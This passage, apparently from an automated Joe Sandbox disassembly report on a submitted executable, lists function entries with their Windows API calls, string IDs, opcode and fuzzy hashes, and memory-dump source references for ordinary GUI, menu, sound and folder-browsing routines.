                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: @U=u$static
                                                            • API String ID: 2559357485-3553413495
                                                            • Opcode ID: 540e82f36f77e8514e3c95d7012c30e3188360ee80057e9784f4985b0a4aba9f
                                                            • Instruction ID: 3b813c2218496eae8ca1178f0d7a46355add03555070a574731ce4214eaccf28
                                                            • Opcode Fuzzy Hash: 540e82f36f77e8514e3c95d7012c30e3188360ee80057e9784f4985b0a4aba9f
                                                            • Instruction Fuzzy Hash: 2B314772104214ABDF129F64EC08FDA3BA9EF09362F250225FE15EA2A0D731D815DBB4
                                                            Function 00D2F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D0E2A0,00000010,?,Bad directive syntax error,00D5F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00D2F7C2
                                                            • LoadStringW.USER32(00000000,?,00D0E2A0,00000010), ref: 00D2F7C9
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                            • _wprintf.LIBCMT ref: 00D2F7FC
                                                            • __swprintf.LIBCMT ref: 00D2F81E
                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00D2F88D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 1506413516-4153970271
                                                            • Opcode ID: dd51f278cb0d7cf2e9321b38bbb31873a2e98b59b78e3c81c39b1815d595be88
                                                            • Instruction ID: c9c48e2c8d6a6403b32cf119547e76869c3ba5845fb210076ee6654ab719072d
                                                            • Opcode Fuzzy Hash: dd51f278cb0d7cf2e9321b38bbb31873a2e98b59b78e3c81c39b1815d595be88
                                                            • Instruction Fuzzy Hash: 7B214F3194021DBFCF11EF90CC5AEEEB739BF28301F040866F615661A1EA719618EB61
                                                            Function 00D352C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                              • Part of subcall function 00CD7924: _memmove.LIBCMT ref: 00CD79AD
                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D35330
                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D35346
                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D35357
                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D35369
                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D3537A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: 2f0d9d9068adfc111b4618110199da906a9bed1c01c638be319af0904a9c0c8d
                                                            • Instruction ID: 1ed95badf685207f2726064943856d323b1ae440799884af9c2c085055b81b89
                                                            • Opcode Fuzzy Hash: 2f0d9d9068adfc111b4618110199da906a9bed1c01c638be319af0904a9c0c8d
                                                            • Instruction Fuzzy Hash: 2E118231A902297DD720B765DC5ADFFBB7CEBD5B40F80052AB901A21D1EEB04D09D6B0
                                                            Function 00D346B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: b40cf969be6ee0ccaf6b90185d3d46abe61407a4b2e8a69034f3f725b2433439
                                                            • Instruction ID: ea791a52c1d95a61267c4dba0d50c74f2bdc9c54434750c4ababecf9ab0a6007
                                                            • Opcode Fuzzy Hash: b40cf969be6ee0ccaf6b90185d3d46abe61407a4b2e8a69034f3f725b2433439
                                                            • Instruction Fuzzy Hash: 231127715002186FCB14AB309C46EEA7BBCEF02712F0441B6F945D61A1FF759981DAB1
                                                            Function 00D3D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • CoInitialize.OLE32(00000000), ref: 00D3D5EA
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00D3D67D
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00D3D691
                                                            • CoCreateInstance.OLE32(00D62D7C,00000000,00000001,00D88C1C,?), ref: 00D3D6DD
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00D3D74C
                                                            • CoTaskMemFree.OLE32(?,?), ref: 00D3D7A4
                                                            • _memset.LIBCMT ref: 00D3D7E1
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00D3D81D
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00D3D840
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00D3D847
                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00D3D87E
                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 00D3D880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                            • String ID:
                                                            • API String ID: 1246142700-0
                                                            • Opcode ID: b9aa05064545af6c05c4fc07842e758077fc2fe4a42698e39f29e42a38aa563c
                                                            • Instruction ID: 340df78ed2fcf01c1b9aa492394a9925df5bb5d2d7d981bf60c0f6036fcebe01
                                                            • Opcode Fuzzy Hash: b9aa05064545af6c05c4fc07842e758077fc2fe4a42698e39f29e42a38aa563c
                                                            • Instruction Fuzzy Hash: ECB1E975A00209AFDB04DFA4D885DAEBBB9EF48304F148469E919DB361DB30ED45DF60
                                                            Function 00D2C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 00D2C283
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D2C295
                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D2C2F3
                                                            • GetDlgItem.USER32(?,00000002), ref: 00D2C2FE
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D2C310
                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D2C364
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00D2C372
                                                            • GetWindowRect.USER32(00000000,?), ref: 00D2C383
                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D2C3C6
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00D2C3D4
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D2C3F1
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00D2C3FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: e4e420edb4abde3d096ccbc08bf79a6ea9914abd7db6d547fba9ff8668c4d9a2
                                                            • Instruction ID: d60fa7826970a9b412caf3f89ba33fc0c4b7eae06a97bd6bfea5cdb8ad681849
                                                            • Opcode Fuzzy Hash: e4e420edb4abde3d096ccbc08bf79a6ea9914abd7db6d547fba9ff8668c4d9a2
                                                            • Instruction Fuzzy Hash: D8514F71B10305AFDB18CFA9DD89AAEBBBAEB98711F14852DF915D7290D7709D008B20
                                                            Function 00CD201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CD2036,?,00000000,?,?,?,?,00CD16CB,00000000,?), ref: 00CD1B9A
                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00CD20D3
                                                            • KillTimer.USER32(-00000001,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00CD216E
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00D0BCA6
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00D0BCD7
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00D0BCEE
                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00CD16CB,00000000,?,?,00CD1AE2,?,?), ref: 00D0BD0A
                                                            • DeleteObject.GDI32(00000000), ref: 00D0BD1C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: ea57d78daff417a4d83412cf561a0327a3bf7ca2fa2579628735b882feb86ae7
                                                            • Instruction ID: 207de0072afe826de424675451d85edcb66df818b2a97f3916e81f6502bbc2aa
                                                            • Opcode Fuzzy Hash: ea57d78daff417a4d83412cf561a0327a3bf7ca2fa2579628735b882feb86ae7
                                                            • Instruction Fuzzy Hash: 8A617D31104B00DFDB36AF15E948B29B7F1FB50322F14852BE6568A7A4C770AD91DB70
                                                            Function 00CD21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00CD25EC
                                                            • GetSysColor.USER32(0000000F), ref: 00CD21D3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: bf5165d64c8ca8517ff648040a65f91f3bcef793e028628674eddebe3b12683d
                                                            • Instruction ID: 59f1f3e12b4c7f6e17e942aadb7955f3d023f06b4b0c21c616a3090e597a85c6
                                                            • Opcode Fuzzy Hash: bf5165d64c8ca8517ff648040a65f91f3bcef793e028628674eddebe3b12683d
                                                            • Instruction Fuzzy Hash: 08415E31104740ABDB255F28EC88BB93B65EB26332F184266FE658E3E5D7318D42DB61
                                                            Function 00D3A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,00D5F910), ref: 00D3A90B
                                                            • GetDriveTypeW.KERNEL32(00000061,00D889A0,00000061), ref: 00D3A9D5
                                                            • _wcscpy.LIBCMT ref: 00D3A9FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2820617543-1000479233
                                                            • Opcode ID: 0fdd49f5c5a8baa464818122078af99dda173ce8920c51dcf8f78a8b513cef86
                                                            • Instruction ID: bb63e14599a5c3ff6431cf894033d63fe6d2887cb2ec6bf34645c6ddeb059df6
                                                            • Opcode Fuzzy Hash: 0fdd49f5c5a8baa464818122078af99dda173ce8920c51dcf8f78a8b513cef86
                                                            • Instruction Fuzzy Hash: B3517D312183019FC700EF18C992AAFB7A5EF84744F95482EF5D5972A2DB31D909EB63
                                                            Function 00D58645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00D586FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID: @U=u
                                                            • API String ID: 634782764-2594219639
                                                            • Opcode ID: 9317409bf4cc9ad44db51a09027087ef5ffadb23fd1141907be9eefd39f34ad8
                                                            • Instruction ID: c46975ebada0032d288e506bcfe9e98a49b473c2dafbdd5eb525026b7c7ce684
                                                            • Opcode Fuzzy Hash: 9317409bf4cc9ad44db51a09027087ef5ffadb23fd1141907be9eefd39f34ad8
                                                            • Instruction Fuzzy Hash: 6851A130500344BEEF209B25DC85FA97BA4EB09362F644116FD51F62A1CF71E988EB71
                                                            Function 00CD2B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D0C2F7
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0C319
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D0C331
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D0C34F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D0C370
                                                            • DestroyIcon.USER32(00000000), ref: 00D0C37F
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D0C39C
                                                            • DestroyIcon.USER32(?), ref: 00D0C3AB
                                                              • Part of subcall function 00D5A4AF: DeleteObject.GDI32(00000000), ref: 00D5A4E8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID: @U=u
                                                            • API String ID: 2819616528-2594219639
                                                            • Opcode ID: 50a1201c0e3596ebba3ae6546ce85bcf9dcc79deee0169fed8e6611ea11e1bf0
                                                            • Instruction ID: 934495655263afd51eddd2e108a67e9988c52a6ce019a7adc3f5cc3035e3605c
                                                            • Opcode Fuzzy Hash: 50a1201c0e3596ebba3ae6546ce85bcf9dcc79deee0169fed8e6611ea11e1bf0
                                                            • Instruction Fuzzy Hash: 5E515970A20305AFDB20DF65DC45BAA7BA5EB58311F10462AFA16D73E0D7B0ED90DB60
                                                            Function 00CD9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __i64tow__itow__swprintf
                                                            • String ID: %.15g$0x%p$False$True
                                                            • API String ID: 421087845-2263619337
                                                            • Opcode ID: e259c6650259b750c2cd7b5d89f8809ca902ecfd693ddb8038564febe03579e9
                                                            • Instruction ID: 2f6a3d639fd9816790eaa4094f710f0022669f77bd2d18e4eebed6c0d7489ddf
                                                            • Opcode Fuzzy Hash: e259c6650259b750c2cd7b5d89f8809ca902ecfd693ddb8038564febe03579e9
                                                            • Instruction Fuzzy Hash: 5341C275900209AFEB24DF34DC46A7A77E9EF05700F34446EE649D72D2EA31D941AB21
                                                            Function 00D57152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D5716A
                                                            • CreateMenu.USER32 ref: 00D57185
                                                            • SetMenu.USER32(?,00000000), ref: 00D57194
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D57221
                                                            • IsMenu.USER32(?), ref: 00D57237
                                                            • CreatePopupMenu.USER32 ref: 00D57241
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D5726E
                                                            • DrawMenuBar.USER32 ref: 00D57276
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                            • String ID: 0$F
                                                            • API String ID: 176399719-3044882817
                                                            • Opcode ID: 62269ed746ebfac713df66ffdbfa8327b1e2d69e1988171a5dfb56e0c697d017
                                                            • Instruction ID: 0ae266f5d88c2c43676cbd895c7e9cac40baee44e8315150f768122a8e932311
                                                            • Opcode Fuzzy Hash: 62269ed746ebfac713df66ffdbfa8327b1e2d69e1988171a5dfb56e0c697d017
                                                            • Instruction Fuzzy Hash: 18412674A01305AFDF10DF64E944E9A7BB5FB49351F244029FD459B361D731A914CBA0
                                                            Function 00D28F8F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D29014
                                                            • GetDlgCtrlID.USER32 ref: 00D2901F
                                                            • GetParent.USER32 ref: 00D2903B
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D2903E
                                                            • GetDlgCtrlID.USER32(?), ref: 00D29047
                                                            • GetParent.USER32(?), ref: 00D29063
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D29066
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: @U=u$ComboBox$ListBox
                                                            • API String ID: 1536045017-2258501812
                                                            • Opcode ID: 104ac29ff9fc505160dae0495c1d95d86c3dd8764dc1dcc25f920dc3ef3b486f
                                                            • Instruction ID: 809a5a7a100f5ea1f8f1a498d04408bf60b8bc5ddbfc46fd6112084f3b5c202d
                                                            • Opcode Fuzzy Hash: 104ac29ff9fc505160dae0495c1d95d86c3dd8764dc1dcc25f920dc3ef3b486f
                                                            • Instruction Fuzzy Hash: F121D070A00208BFDF04ABA4DC95EFEBBB5EF59310F10011AB961972A1DB759819EB30
                                                            Function 00D2907A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D2AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D2AABC
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D290FD
                                                            • GetDlgCtrlID.USER32 ref: 00D29108
                                                            • GetParent.USER32 ref: 00D29124
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D29127
                                                            • GetDlgCtrlID.USER32(?), ref: 00D29130
                                                            • GetParent.USER32(?), ref: 00D2914C
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D2914F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
